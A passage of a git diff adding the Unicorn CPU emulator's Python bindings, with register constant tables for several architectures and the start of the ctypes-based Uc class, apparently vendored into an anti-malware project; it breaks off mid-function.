AUTO-GENERATED FILE, DO NOT EDIT [arm_const.py] + +# ARM registers + +UC_ARM_REG_INVALID = 0 +UC_ARM_REG_APSR = 1 +UC_ARM_REG_APSR_NZCV = 2 +UC_ARM_REG_CPSR = 3 +UC_ARM_REG_FPEXC = 4 +UC_ARM_REG_FPINST = 5 +UC_ARM_REG_FPSCR = 6 +UC_ARM_REG_FPSCR_NZCV = 7 +UC_ARM_REG_FPSID = 8 +UC_ARM_REG_ITSTATE = 9 +UC_ARM_REG_LR = 10 +UC_ARM_REG_PC = 11 +UC_ARM_REG_SP = 12 +UC_ARM_REG_SPSR = 13 +UC_ARM_REG_D0 = 14 +UC_ARM_REG_D1 = 15 +UC_ARM_REG_D2 = 16 +UC_ARM_REG_D3 = 17 +UC_ARM_REG_D4 = 18 +UC_ARM_REG_D5 = 19 +UC_ARM_REG_D6 = 20 +UC_ARM_REG_D7 = 21 +UC_ARM_REG_D8 = 22 +UC_ARM_REG_D9 = 23 +UC_ARM_REG_D10 = 24 +UC_ARM_REG_D11 = 25 +UC_ARM_REG_D12 = 26 +UC_ARM_REG_D13 = 27 +UC_ARM_REG_D14 = 28 +UC_ARM_REG_D15 = 29 +UC_ARM_REG_D16 = 30 +UC_ARM_REG_D17 = 31 +UC_ARM_REG_D18 = 32 +UC_ARM_REG_D19 = 33 +UC_ARM_REG_D20 = 34 +UC_ARM_REG_D21 = 35 +UC_ARM_REG_D22 = 36 +UC_ARM_REG_D23 = 37 +UC_ARM_REG_D24 = 38 +UC_ARM_REG_D25 = 39 +UC_ARM_REG_D26 = 40 +UC_ARM_REG_D27 = 41 +UC_ARM_REG_D28 = 42 +UC_ARM_REG_D29 = 43 +UC_ARM_REG_D30 = 44 +UC_ARM_REG_D31 = 45 +UC_ARM_REG_FPINST2 = 46 +UC_ARM_REG_MVFR0 = 47 +UC_ARM_REG_MVFR1 = 48 +UC_ARM_REG_MVFR2 = 49 +UC_ARM_REG_Q0 = 50 +UC_ARM_REG_Q1 = 51 +UC_ARM_REG_Q2 = 52 +UC_ARM_REG_Q3 = 53 +UC_ARM_REG_Q4 = 54 +UC_ARM_REG_Q5 = 55 +UC_ARM_REG_Q6 = 56 +UC_ARM_REG_Q7 = 57 +UC_ARM_REG_Q8 = 58 +UC_ARM_REG_Q9 = 59 +UC_ARM_REG_Q10 = 60 +UC_ARM_REG_Q11 = 61 +UC_ARM_REG_Q12 = 62 +UC_ARM_REG_Q13 = 63 +UC_ARM_REG_Q14 = 64 +UC_ARM_REG_Q15 = 65 +UC_ARM_REG_R0 = 66 +UC_ARM_REG_R1 = 67 +UC_ARM_REG_R2 = 68 +UC_ARM_REG_R3 = 69 +UC_ARM_REG_R4 = 70 +UC_ARM_REG_R5 = 71 +UC_ARM_REG_R6 = 72 +UC_ARM_REG_R7 = 73 +UC_ARM_REG_R8 = 74 +UC_ARM_REG_R9 = 75 +UC_ARM_REG_R10 = 76 +UC_ARM_REG_R11 = 77 +UC_ARM_REG_R12 = 78 +UC_ARM_REG_S0 = 79 +UC_ARM_REG_S1 = 80 +UC_ARM_REG_S2 = 81 +UC_ARM_REG_S3 = 82 +UC_ARM_REG_S4 = 83 +UC_ARM_REG_S5 = 84 +UC_ARM_REG_S6 = 85 +UC_ARM_REG_S7 = 86 +UC_ARM_REG_S8 = 87 +UC_ARM_REG_S9 = 88 +UC_ARM_REG_S10 = 89 +UC_ARM_REG_S11 = 90 +UC_ARM_REG_S12 = 91 
+UC_ARM_REG_S13 = 92 +UC_ARM_REG_S14 = 93 +UC_ARM_REG_S15 = 94 +UC_ARM_REG_S16 = 95 +UC_ARM_REG_S17 = 96 +UC_ARM_REG_S18 = 97 +UC_ARM_REG_S19 = 98 +UC_ARM_REG_S20 = 99 +UC_ARM_REG_S21 = 100 +UC_ARM_REG_S22 = 101 +UC_ARM_REG_S23 = 102 +UC_ARM_REG_S24 = 103 +UC_ARM_REG_S25 = 104 +UC_ARM_REG_S26 = 105 +UC_ARM_REG_S27 = 106 +UC_ARM_REG_S28 = 107 +UC_ARM_REG_S29 = 108 +UC_ARM_REG_S30 = 109 +UC_ARM_REG_S31 = 110 +UC_ARM_REG_C1_C0_2 = 111 +UC_ARM_REG_C13_C0_2 = 112 +UC_ARM_REG_C13_C0_3 = 113 +UC_ARM_REG_IPSR = 114 +UC_ARM_REG_MSP = 115 +UC_ARM_REG_PSP = 116 +UC_ARM_REG_CONTROL = 117 +UC_ARM_REG_ENDING = 118 + +# alias registers +UC_ARM_REG_R13 = 12 +UC_ARM_REG_R14 = 10 +UC_ARM_REG_R15 = 11 +UC_ARM_REG_SB = 75 +UC_ARM_REG_SL = 76 +UC_ARM_REG_FP = 77 +UC_ARM_REG_IP = 78 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py new file mode 100644 index 0000000..37b00b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py @@ -0,0 +1,24 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.py] + +# M68K registers + +UC_M68K_REG_INVALID = 0 +UC_M68K_REG_A0 = 1 +UC_M68K_REG_A1 = 2 +UC_M68K_REG_A2 = 3 +UC_M68K_REG_A3 = 4 +UC_M68K_REG_A4 = 5 +UC_M68K_REG_A5 = 6 +UC_M68K_REG_A6 = 7 +UC_M68K_REG_A7 = 8 +UC_M68K_REG_D0 = 9 +UC_M68K_REG_D1 = 10 +UC_M68K_REG_D2 = 11 +UC_M68K_REG_D3 = 12 +UC_M68K_REG_D4 = 13 +UC_M68K_REG_D5 = 14 +UC_M68K_REG_D6 = 15 +UC_M68K_REG_D7 = 16 +UC_M68K_REG_SR = 17 +UC_M68K_REG_PC = 18 +UC_M68K_REG_ENDING = 19 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py new file mode 100644 index 0000000..98e1ecc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py @@ -0,0 +1,197 @@ +# For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT [mips_const.py] + +# MIPS registers + +UC_MIPS_REG_INVALID = 0 + +# General purpose registers +UC_MIPS_REG_PC = 1 +UC_MIPS_REG_0 = 2 +UC_MIPS_REG_1 = 3 +UC_MIPS_REG_2 = 4 +UC_MIPS_REG_3 = 5 +UC_MIPS_REG_4 = 6 +UC_MIPS_REG_5 = 7 +UC_MIPS_REG_6 = 8 +UC_MIPS_REG_7 = 9 +UC_MIPS_REG_8 = 10 +UC_MIPS_REG_9 = 11 +UC_MIPS_REG_10 = 12 +UC_MIPS_REG_11 = 13 +UC_MIPS_REG_12 = 14 +UC_MIPS_REG_13 = 15 +UC_MIPS_REG_14 = 16 +UC_MIPS_REG_15 = 17 +UC_MIPS_REG_16 = 18 +UC_MIPS_REG_17 = 19 +UC_MIPS_REG_18 = 20 +UC_MIPS_REG_19 = 21 +UC_MIPS_REG_20 = 22 +UC_MIPS_REG_21 = 23 +UC_MIPS_REG_22 = 24 +UC_MIPS_REG_23 = 25 +UC_MIPS_REG_24 = 26 +UC_MIPS_REG_25 = 27 +UC_MIPS_REG_26 = 28 +UC_MIPS_REG_27 = 29 +UC_MIPS_REG_28 = 30 +UC_MIPS_REG_29 = 31 +UC_MIPS_REG_30 = 32 +UC_MIPS_REG_31 = 33 + +# DSP registers +UC_MIPS_REG_DSPCCOND = 34 +UC_MIPS_REG_DSPCARRY = 35 +UC_MIPS_REG_DSPEFI = 36 +UC_MIPS_REG_DSPOUTFLAG = 37 +UC_MIPS_REG_DSPOUTFLAG16_19 = 38 +UC_MIPS_REG_DSPOUTFLAG20 = 39 +UC_MIPS_REG_DSPOUTFLAG21 = 40 +UC_MIPS_REG_DSPOUTFLAG22 = 41 +UC_MIPS_REG_DSPOUTFLAG23 = 42 +UC_MIPS_REG_DSPPOS = 43 +UC_MIPS_REG_DSPSCOUNT = 44 + +# ACC registers +UC_MIPS_REG_AC0 = 45 +UC_MIPS_REG_AC1 = 46 +UC_MIPS_REG_AC2 = 47 +UC_MIPS_REG_AC3 = 48 + +# COP registers +UC_MIPS_REG_CC0 = 49 +UC_MIPS_REG_CC1 = 50 +UC_MIPS_REG_CC2 = 51 +UC_MIPS_REG_CC3 = 52 +UC_MIPS_REG_CC4 = 53 +UC_MIPS_REG_CC5 = 54 +UC_MIPS_REG_CC6 = 55 +UC_MIPS_REG_CC7 = 56 + +# FPU registers +UC_MIPS_REG_F0 = 57 +UC_MIPS_REG_F1 = 58 +UC_MIPS_REG_F2 = 59 +UC_MIPS_REG_F3 = 60 +UC_MIPS_REG_F4 = 61 +UC_MIPS_REG_F5 = 62 +UC_MIPS_REG_F6 = 63 +UC_MIPS_REG_F7 = 64 +UC_MIPS_REG_F8 = 65 +UC_MIPS_REG_F9 = 66 +UC_MIPS_REG_F10 = 67 +UC_MIPS_REG_F11 = 68 +UC_MIPS_REG_F12 = 69 +UC_MIPS_REG_F13 = 70 +UC_MIPS_REG_F14 = 71 +UC_MIPS_REG_F15 = 72 +UC_MIPS_REG_F16 = 73 +UC_MIPS_REG_F17 = 74 +UC_MIPS_REG_F18 = 75 +UC_MIPS_REG_F19 = 76 +UC_MIPS_REG_F20 = 77 +UC_MIPS_REG_F21 = 78 +UC_MIPS_REG_F22 = 79 +UC_MIPS_REG_F23 = 80 +UC_MIPS_REG_F24 = 81 
+UC_MIPS_REG_F25 = 82 +UC_MIPS_REG_F26 = 83 +UC_MIPS_REG_F27 = 84 +UC_MIPS_REG_F28 = 85 +UC_MIPS_REG_F29 = 86 +UC_MIPS_REG_F30 = 87 +UC_MIPS_REG_F31 = 88 +UC_MIPS_REG_FCC0 = 89 +UC_MIPS_REG_FCC1 = 90 +UC_MIPS_REG_FCC2 = 91 +UC_MIPS_REG_FCC3 = 92 +UC_MIPS_REG_FCC4 = 93 +UC_MIPS_REG_FCC5 = 94 +UC_MIPS_REG_FCC6 = 95 +UC_MIPS_REG_FCC7 = 96 + +# AFPR128 +UC_MIPS_REG_W0 = 97 +UC_MIPS_REG_W1 = 98 +UC_MIPS_REG_W2 = 99 +UC_MIPS_REG_W3 = 100 +UC_MIPS_REG_W4 = 101 +UC_MIPS_REG_W5 = 102 +UC_MIPS_REG_W6 = 103 +UC_MIPS_REG_W7 = 104 +UC_MIPS_REG_W8 = 105 +UC_MIPS_REG_W9 = 106 +UC_MIPS_REG_W10 = 107 +UC_MIPS_REG_W11 = 108 +UC_MIPS_REG_W12 = 109 +UC_MIPS_REG_W13 = 110 +UC_MIPS_REG_W14 = 111 +UC_MIPS_REG_W15 = 112 +UC_MIPS_REG_W16 = 113 +UC_MIPS_REG_W17 = 114 +UC_MIPS_REG_W18 = 115 +UC_MIPS_REG_W19 = 116 +UC_MIPS_REG_W20 = 117 +UC_MIPS_REG_W21 = 118 +UC_MIPS_REG_W22 = 119 +UC_MIPS_REG_W23 = 120 +UC_MIPS_REG_W24 = 121 +UC_MIPS_REG_W25 = 122 +UC_MIPS_REG_W26 = 123 +UC_MIPS_REG_W27 = 124 +UC_MIPS_REG_W28 = 125 +UC_MIPS_REG_W29 = 126 +UC_MIPS_REG_W30 = 127 +UC_MIPS_REG_W31 = 128 +UC_MIPS_REG_HI = 129 +UC_MIPS_REG_LO = 130 +UC_MIPS_REG_P0 = 131 +UC_MIPS_REG_P1 = 132 +UC_MIPS_REG_P2 = 133 +UC_MIPS_REG_MPL0 = 134 +UC_MIPS_REG_MPL1 = 135 +UC_MIPS_REG_MPL2 = 136 +UC_MIPS_REG_CP0_CONFIG3 = 137 +UC_MIPS_REG_CP0_USERLOCAL = 138 +UC_MIPS_REG_ENDING = 139 +UC_MIPS_REG_ZERO = 2 +UC_MIPS_REG_AT = 3 +UC_MIPS_REG_V0 = 4 +UC_MIPS_REG_V1 = 5 +UC_MIPS_REG_A0 = 6 +UC_MIPS_REG_A1 = 7 +UC_MIPS_REG_A2 = 8 +UC_MIPS_REG_A3 = 9 +UC_MIPS_REG_T0 = 10 +UC_MIPS_REG_T1 = 11 +UC_MIPS_REG_T2 = 12 +UC_MIPS_REG_T3 = 13 +UC_MIPS_REG_T4 = 14 +UC_MIPS_REG_T5 = 15 +UC_MIPS_REG_T6 = 16 +UC_MIPS_REG_T7 = 17 +UC_MIPS_REG_S0 = 18 +UC_MIPS_REG_S1 = 19 +UC_MIPS_REG_S2 = 20 +UC_MIPS_REG_S3 = 21 +UC_MIPS_REG_S4 = 22 +UC_MIPS_REG_S5 = 23 +UC_MIPS_REG_S6 = 24 +UC_MIPS_REG_S7 = 25 +UC_MIPS_REG_T8 = 26 +UC_MIPS_REG_T9 = 27 +UC_MIPS_REG_K0 = 28 +UC_MIPS_REG_K1 = 29 +UC_MIPS_REG_GP = 30 +UC_MIPS_REG_SP = 31 +UC_MIPS_REG_FP = 32 
+UC_MIPS_REG_S8 = 32 +UC_MIPS_REG_RA = 33 +UC_MIPS_REG_HI0 = 45 +UC_MIPS_REG_HI1 = 46 +UC_MIPS_REG_HI2 = 47 +UC_MIPS_REG_HI3 = 48 +UC_MIPS_REG_LO0 = 45 +UC_MIPS_REG_LO1 = 46 +UC_MIPS_REG_LO2 = 47 +UC_MIPS_REG_LO3 = 48 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py new file mode 100644 index 0000000..7bd326d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/sparc_const.py @@ -0,0 +1,96 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.py] + +# SPARC registers + +UC_SPARC_REG_INVALID = 0 +UC_SPARC_REG_F0 = 1 +UC_SPARC_REG_F1 = 2 +UC_SPARC_REG_F2 = 3 +UC_SPARC_REG_F3 = 4 +UC_SPARC_REG_F4 = 5 +UC_SPARC_REG_F5 = 6 +UC_SPARC_REG_F6 = 7 +UC_SPARC_REG_F7 = 8 +UC_SPARC_REG_F8 = 9 +UC_SPARC_REG_F9 = 10 +UC_SPARC_REG_F10 = 11 +UC_SPARC_REG_F11 = 12 +UC_SPARC_REG_F12 = 13 +UC_SPARC_REG_F13 = 14 +UC_SPARC_REG_F14 = 15 +UC_SPARC_REG_F15 = 16 +UC_SPARC_REG_F16 = 17 +UC_SPARC_REG_F17 = 18 +UC_SPARC_REG_F18 = 19 +UC_SPARC_REG_F19 = 20 +UC_SPARC_REG_F20 = 21 +UC_SPARC_REG_F21 = 22 +UC_SPARC_REG_F22 = 23 +UC_SPARC_REG_F23 = 24 +UC_SPARC_REG_F24 = 25 +UC_SPARC_REG_F25 = 26 +UC_SPARC_REG_F26 = 27 +UC_SPARC_REG_F27 = 28 +UC_SPARC_REG_F28 = 29 +UC_SPARC_REG_F29 = 30 +UC_SPARC_REG_F30 = 31 +UC_SPARC_REG_F31 = 32 +UC_SPARC_REG_F32 = 33 +UC_SPARC_REG_F34 = 34 +UC_SPARC_REG_F36 = 35 +UC_SPARC_REG_F38 = 36 +UC_SPARC_REG_F40 = 37 +UC_SPARC_REG_F42 = 38 +UC_SPARC_REG_F44 = 39 +UC_SPARC_REG_F46 = 40 +UC_SPARC_REG_F48 = 41 +UC_SPARC_REG_F50 = 42 +UC_SPARC_REG_F52 = 43 +UC_SPARC_REG_F54 = 44 +UC_SPARC_REG_F56 = 45 +UC_SPARC_REG_F58 = 46 +UC_SPARC_REG_F60 = 47 +UC_SPARC_REG_F62 = 48 +UC_SPARC_REG_FCC0 = 49 +UC_SPARC_REG_FCC1 = 50 +UC_SPARC_REG_FCC2 = 51 +UC_SPARC_REG_FCC3 = 52 +UC_SPARC_REG_G0 = 53 +UC_SPARC_REG_G1 = 54 +UC_SPARC_REG_G2 = 55 +UC_SPARC_REG_G3 = 56 +UC_SPARC_REG_G4 = 57 +UC_SPARC_REG_G5 = 58 +UC_SPARC_REG_G6 
= 59 +UC_SPARC_REG_G7 = 60 +UC_SPARC_REG_I0 = 61 +UC_SPARC_REG_I1 = 62 +UC_SPARC_REG_I2 = 63 +UC_SPARC_REG_I3 = 64 +UC_SPARC_REG_I4 = 65 +UC_SPARC_REG_I5 = 66 +UC_SPARC_REG_FP = 67 +UC_SPARC_REG_I7 = 68 +UC_SPARC_REG_ICC = 69 +UC_SPARC_REG_L0 = 70 +UC_SPARC_REG_L1 = 71 +UC_SPARC_REG_L2 = 72 +UC_SPARC_REG_L3 = 73 +UC_SPARC_REG_L4 = 74 +UC_SPARC_REG_L5 = 75 +UC_SPARC_REG_L6 = 76 +UC_SPARC_REG_L7 = 77 +UC_SPARC_REG_O0 = 78 +UC_SPARC_REG_O1 = 79 +UC_SPARC_REG_O2 = 80 +UC_SPARC_REG_O3 = 81 +UC_SPARC_REG_O4 = 82 +UC_SPARC_REG_O5 = 83 +UC_SPARC_REG_SP = 84 +UC_SPARC_REG_O7 = 85 +UC_SPARC_REG_Y = 86 +UC_SPARC_REG_XCC = 87 +UC_SPARC_REG_PC = 88 +UC_SPARC_REG_ENDING = 89 +UC_SPARC_REG_O6 = 84 +UC_SPARC_REG_I6 = 67 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py new file mode 100644 index 0000000..7f76976 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/unicorn.py @@ -0,0 +1,689 @@ +# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com> + +import ctypes +import ctypes.util +import distutils.sysconfig +import pkg_resources +import inspect +import os.path +import sys +import weakref + +from . 
import x86_const, arm64_const, unicorn_const as uc + +if not hasattr(sys.modules[__name__], "__file__"): + __file__ = inspect.getfile(inspect.currentframe()) + +_python2 = sys.version_info[0] < 3 +if _python2: + range = xrange + +_lib = { 'darwin': 'libunicorn.dylib', + 'win32': 'unicorn.dll', + 'cygwin': 'cygunicorn.dll', + 'linux': 'libunicorn.so', + 'linux2': 'libunicorn.so' } + + +# Windows DLL in dependency order +_all_windows_dlls = ( + "libwinpthread-1.dll", + "libgcc_s_seh-1.dll", + "libgcc_s_dw2-1.dll", +) + +_loaded_windows_dlls = set() + +def _load_win_support(path): + for dll in _all_windows_dlls: + if dll in _loaded_windows_dlls: + continue + + lib_file = os.path.join(path, dll) + if ('/' not in path and '\\' not in path) or os.path.exists(lib_file): + try: + #print('Trying to load Windows library', lib_file) + ctypes.cdll.LoadLibrary(lib_file) + #print('SUCCESS') + _loaded_windows_dlls.add(dll) + except OSError as e: + #print('FAIL to load %s' %lib_file, e) + continue + +# Initial attempt: load all dlls globally +if sys.platform in ('win32', 'cygwin'): + _load_win_support('') + +def _load_lib(path): + try: + if sys.platform in ('win32', 'cygwin'): + _load_win_support(path) + + lib_file = os.path.join(path, _lib.get(sys.platform, 'libunicorn.so')) + #print('Trying to load shared library', lib_file) + dll = ctypes.cdll.LoadLibrary(lib_file) + #print('SUCCESS') + return dll + except OSError as e: + #print('FAIL to load %s' %lib_file, e) + return None + +_uc = None + +# Loading attempts, in order +# - user-provided environment variable +# - pkg_resources can get us the path to the local libraries +# - we can get the path to the local libraries by parsing our filename +# - global load +# - python's lib directory +# - last-gasp attempt at some hardcoded paths on darwin and linux + +_path_list = [os.getenv('LIBUNICORN_PATH', None), + pkg_resources.resource_filename(__name__, 'lib'), + os.path.join(os.path.split(__file__)[0], 'lib'), + '', + 
distutils.sysconfig.get_python_lib(), + "/usr/local/lib/" if sys.platform == 'darwin' else '/usr/lib64', + os.getenv('PATH', '')] + +#print(_path_list) +#print("-" * 80) + +for _path in _path_list: + if _path is None: continue + _uc = _load_lib(_path) + if _uc is not None: break +else: + raise ImportError("ERROR: fail to load the dynamic library.") + +__version__ = "%u.%u.%u" % (uc.UC_VERSION_MAJOR, uc.UC_VERSION_MINOR, uc.UC_VERSION_EXTRA) + +# setup all the function prototype +def _setup_prototype(lib, fname, restype, *argtypes): + getattr(lib, fname).restype = restype + getattr(lib, fname).argtypes = argtypes + +ucerr = ctypes.c_int +uc_engine = ctypes.c_void_p +uc_context = ctypes.c_void_p +uc_hook_h = ctypes.c_size_t + +class _uc_mem_region(ctypes.Structure): + _fields_ = [ + ("begin", ctypes.c_uint64), + ("end", ctypes.c_uint64), + ("perms", ctypes.c_uint32), + ] + + +_setup_prototype(_uc, "uc_version", ctypes.c_uint, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int)) +_setup_prototype(_uc, "uc_arch_supported", ctypes.c_bool, ctypes.c_int) +_setup_prototype(_uc, "uc_open", ucerr, ctypes.c_uint, ctypes.c_uint, ctypes.POINTER(uc_engine)) +_setup_prototype(_uc, "uc_close", ucerr, uc_engine) +_setup_prototype(_uc, "uc_strerror", ctypes.c_char_p, ucerr) +_setup_prototype(_uc, "uc_errno", ucerr, uc_engine) +_setup_prototype(_uc, "uc_reg_read", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) +_setup_prototype(_uc, "uc_reg_write", ucerr, uc_engine, ctypes.c_int, ctypes.c_void_p) +_setup_prototype(_uc, "uc_mem_read", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) +_setup_prototype(_uc, "uc_mem_write", ucerr, uc_engine, ctypes.c_uint64, ctypes.POINTER(ctypes.c_char), ctypes.c_size_t) +_setup_prototype(_uc, "uc_emu_start", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_size_t) +_setup_prototype(_uc, "uc_emu_stop", ucerr, uc_engine) +_setup_prototype(_uc, "uc_hook_del", ucerr, uc_engine, 
uc_hook_h) +_setup_prototype(_uc, "uc_mem_map", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) +_setup_prototype(_uc, "uc_mem_map_ptr", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_void_p) +_setup_prototype(_uc, "uc_mem_unmap", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t) +_setup_prototype(_uc, "uc_mem_protect", ucerr, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_uint32) +_setup_prototype(_uc, "uc_query", ucerr, uc_engine, ctypes.c_uint32, ctypes.POINTER(ctypes.c_size_t)) +_setup_prototype(_uc, "uc_context_alloc", ucerr, uc_engine, ctypes.POINTER(uc_context)) +_setup_prototype(_uc, "uc_free", ucerr, ctypes.c_void_p) +_setup_prototype(_uc, "uc_context_save", ucerr, uc_engine, uc_context) +_setup_prototype(_uc, "uc_context_restore", ucerr, uc_engine, uc_context) +_setup_prototype(_uc, "uc_context_size", ctypes.c_size_t, uc_engine) +_setup_prototype(_uc, "uc_context_free", ucerr, uc_context) +_setup_prototype(_uc, "uc_mem_regions", ucerr, uc_engine, ctypes.POINTER(ctypes.POINTER(_uc_mem_region)), ctypes.POINTER(ctypes.c_uint32)) + +# uc_hook_add is special due to variable number of arguments +_uc.uc_hook_add = _uc.uc_hook_add +_uc.uc_hook_add.restype = ucerr + +UC_HOOK_CODE_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_uint64, ctypes.c_size_t, ctypes.c_void_p) +UC_HOOK_INSN_INVALID_CB = ctypes.CFUNCTYPE(ctypes.c_bool, uc_engine, ctypes.c_void_p) +UC_HOOK_MEM_INVALID_CB = ctypes.CFUNCTYPE( + ctypes.c_bool, uc_engine, ctypes.c_int, + ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p +) +UC_HOOK_MEM_ACCESS_CB = ctypes.CFUNCTYPE( + None, uc_engine, ctypes.c_int, + ctypes.c_uint64, ctypes.c_int, ctypes.c_int64, ctypes.c_void_p +) +UC_HOOK_INTR_CB = ctypes.CFUNCTYPE( + None, uc_engine, ctypes.c_uint32, ctypes.c_void_p +) +UC_HOOK_INSN_IN_CB = ctypes.CFUNCTYPE( + ctypes.c_uint32, uc_engine, ctypes.c_uint32, ctypes.c_int, ctypes.c_void_p +) +UC_HOOK_INSN_OUT_CB = ctypes.CFUNCTYPE( + None, 
uc_engine, ctypes.c_uint32, + ctypes.c_int, ctypes.c_uint32, ctypes.c_void_p +) +UC_HOOK_INSN_SYSCALL_CB = ctypes.CFUNCTYPE(None, uc_engine, ctypes.c_void_p) + + +# access to error code via @errno of UcError +class UcError(Exception): + def __init__(self, errno): + self.errno = errno + + def __str__(self): + return _uc.uc_strerror(self.errno).decode('ascii') + + +# return the core's version +def uc_version(): + major = ctypes.c_int() + minor = ctypes.c_int() + combined = _uc.uc_version(ctypes.byref(major), ctypes.byref(minor)) + return (major.value, minor.value, combined) + + +# return the binding's version +def version_bind(): + return ( + uc.UC_API_MAJOR, uc.UC_API_MINOR, + (uc.UC_API_MAJOR << 8) + uc.UC_API_MINOR, + ) + + +# check to see if this engine supports a particular arch +def uc_arch_supported(query): + return _uc.uc_arch_supported(query) + + +class uc_x86_mmr(ctypes.Structure): + """Memory-Management Register for instructions IDTR, GDTR, LDTR, TR.""" + _fields_ = [ + ("selector", ctypes.c_uint16), # not used by GDTR and IDTR + ("base", ctypes.c_uint64), # handle 32 or 64 bit CPUs + ("limit", ctypes.c_uint32), + ("flags", ctypes.c_uint32), # not used by GDTR and IDTR + ] + +class uc_x86_msr(ctypes.Structure): + _fields_ = [ + ("rid", ctypes.c_uint32), + ("value", ctypes.c_uint64), + ] + +class uc_x86_float80(ctypes.Structure): + """Float80""" + _fields_ = [ + ("mantissa", ctypes.c_uint64), + ("exponent", ctypes.c_uint16), + ] + + +class uc_x86_xmm(ctypes.Structure): + """128-bit xmm register""" + _fields_ = [ + ("low_qword", ctypes.c_uint64), + ("high_qword", ctypes.c_uint64), + ] + +class uc_x86_ymm(ctypes.Structure): + """256-bit ymm register""" + _fields_ = [ + ("first_qword", ctypes.c_uint64), + ("second_qword", ctypes.c_uint64), + ("third_qword", ctypes.c_uint64), + ("fourth_qword", ctypes.c_uint64), + ] + +class uc_arm64_neon128(ctypes.Structure): + """128-bit neon register""" + _fields_ = [ + ("low_qword", ctypes.c_uint64), + ("high_qword", 
ctypes.c_uint64), + ] + +# Subclassing ref to allow property assignment. +class UcRef(weakref.ref): + pass + +# This class tracks Uc instance destruction and releases handles. +class UcCleanupManager(object): + def __init__(self): + self._refs = {} + + def register(self, uc): + ref = UcRef(uc, self._finalizer) + ref._uch = uc._uch + ref._class = uc.__class__ + self._refs[id(ref)] = ref + + def _finalizer(self, ref): + # note: this method must be completely self-contained and cannot have any references + # to anything else in this module. + # + # This is because it may be called late in the Python interpreter's shutdown phase, at + # which point the module's variables may already have been deinitialized and set to None. + # + # Not respecting that can lead to errors such as: + # Exception AttributeError: + # "'NoneType' object has no attribute 'release_handle'" + # in <bound method UcCleanupManager._finalizer of + # <unicorn.unicorn.UcCleanupManager object at 0x7f0bb83e4310>> ignored + # + # For that reason, we do not try to access the `Uc` class directly here but instead use + # the saved `._class` reference. 
+ del self._refs[id(ref)] + ref._class.release_handle(ref._uch) + +class Uc(object): + _cleanup = UcCleanupManager() + + def __init__(self, arch, mode): + # verify version compatibility with the core before doing anything + (major, minor, _combined) = uc_version() + if major != uc.UC_API_MAJOR or minor != uc.UC_API_MINOR: + self._uch = None + # our binding version is different from the core's API version + raise UcError(uc.UC_ERR_VERSION) + + self._arch, self._mode = arch, mode + self._uch = ctypes.c_void_p() + status = _uc.uc_open(arch, mode, ctypes.byref(self._uch)) + if status != uc.UC_ERR_OK: + self._uch = None + raise UcError(status) + # internal mapping table to save callback & userdata + self._callbacks = {} + self._ctype_cbs = {} + self._callback_count = 0 + self._cleanup.register(self) + + @staticmethod + def release_handle(uch): + if uch: + try: + status = _uc.uc_close(uch) + if status != uc.UC_ERR_OK: + raise UcError(status) + except: # _uc might be pulled from under our feet + pass + + # emulate from @begin, and stop when reaching address @until + def emu_start(self, begin, until, timeout=0, count=0): + status = _uc.uc_emu_start(self._uch, begin, until, timeout, count) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # stop emulation + def emu_stop(self): + status = _uc.uc_emu_stop(self._uch) + if status != uc.UC_ERR_OK: + raise UcError(status) + + # return the value of a register + def reg_read(self, reg_id, opt=None): + if self._arch == uc.UC_ARCH_X86: + if reg_id in [x86_const.UC_X86_REG_IDTR, x86_const.UC_X86_REG_GDTR, x86_const.UC_X86_REG_LDTR, x86_const.UC_X86_REG_TR]: + reg = uc_x86_mmr() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != uc.UC_ERR_OK: + raise UcError(status) + return reg.selector, reg.base, reg.limit, reg.flags + if reg_id in range(x86_const.UC_X86_REG_FP0, x86_const.UC_X86_REG_FP0+8): + reg = uc_x86_float80() + status = _uc.uc_reg_read(self._uch, reg_id, ctypes.byref(reg)) + if status != 
